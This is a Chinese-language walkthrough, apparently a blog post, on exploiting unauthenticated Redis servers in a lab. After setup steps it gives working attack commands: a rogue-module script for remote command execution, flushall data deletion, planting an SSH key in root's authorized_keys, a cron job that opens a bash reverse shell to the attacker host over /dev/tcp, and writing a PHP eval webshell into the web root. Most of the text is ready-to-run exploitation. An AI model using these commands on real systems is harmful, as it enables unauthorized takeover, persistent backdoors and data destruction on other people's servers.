Redis(6379)未授权访问
环境搭建
打开kali终端 输入命令
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
将redis-server和redis-cli拷贝到/usr/bin目录下
cd ..
返回目录redis-3.2,将redis.conf拷贝到/etc/目录下:
cp redis.conf /etc
使用/etc/目录下的reids.conf文件中的配置启动redis服务:
再次进入src目录
redis-server /etc/redis.conf
编辑etc中的redis配置文件redis.conf
vim /etc/redis.conf
![](https://upload-images.jianshu.io/upload_images/4664072-11b38c73bb45ade3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bcdbacf8dabe715f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
打开kali的第二个终端 再次来到src目录
cd redis-3.2.0
ls
cd src
./redis-cli -h (ip地址)
get dir 或者info
一、脚本测试
https://github.com/vulhub/redis-rogue-getshell
cd RedisModulesSDK/
make
cd ../
python3 redis-master.py -r 192.168.49.2 -p 6379 -L 192.168.49.5 -P 4441 -f RedisModulesSDK/exp.so -c "id"
二、手工测试
1.远程连接
![](https://upload-images.jianshu.io/upload_images/4664072-5b9157708252cbb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看里面的key和其对应的值
2. Redis删除数据
flushall 删除所有数据
del key 删除键为key的数据
![](https://upload-images.jianshu.io/upload_images/4664072-1820828cc1411c5a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3.通过ssh密钥登陆Redis Server
攻击机上ssh-keygen生成公钥和私钥,将公钥写入Redis服务器,即可使用私钥登陆
ssh-keygen
cat /root/.ssh/id_rsa.pub
![](https://upload-images.jianshu.io/upload_images/4664072-aa7a60a9ef4fb297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
输入以下命令:
cd /root/.ssh
ls
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
![](https://upload-images.jianshu.io/upload_images/4664072-4d245ebdfac1e4c2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cat /root/.ssh/key.txt | ./redis-cli -h 192.168.244.128 -x set xxx
![](https://upload-images.jianshu.io/upload_images/4664072-f9ba9ff554d2c75c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
./redis-cli -h 192.168.244.128
config set dir /root/.ssh
config set dbfilename authorized_keys
keys *
save
![](https://upload-images.jianshu.io/upload_images/4664072-54d855b75a3be392.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
这时候用ssh远程连接:
ssh 192.168.244.128
4.在crontab里写定时任务,反弹shell
首先攻击端 开启监听
nc -l 4444
连接redis,写入定时任务
./redis-cli -h 192.168.244.128
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.244.129/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
![](https://upload-images.jianshu.io/upload_images/4664072-a915559cec19cd13.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5.写入webshell文件
./redis-cli -h 192.168.244.128
config set dir /var/www/html
set xxx "\n\n\n<?php @eval($_POST['c']);?>\n\n\n"
config set dbfilename webshell.php
save
![](https://upload-images.jianshu.io/upload_images/4664072-01edc98473437e05.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
脚本检测
https://github.com/n0b0dyCN/redis-rogue-server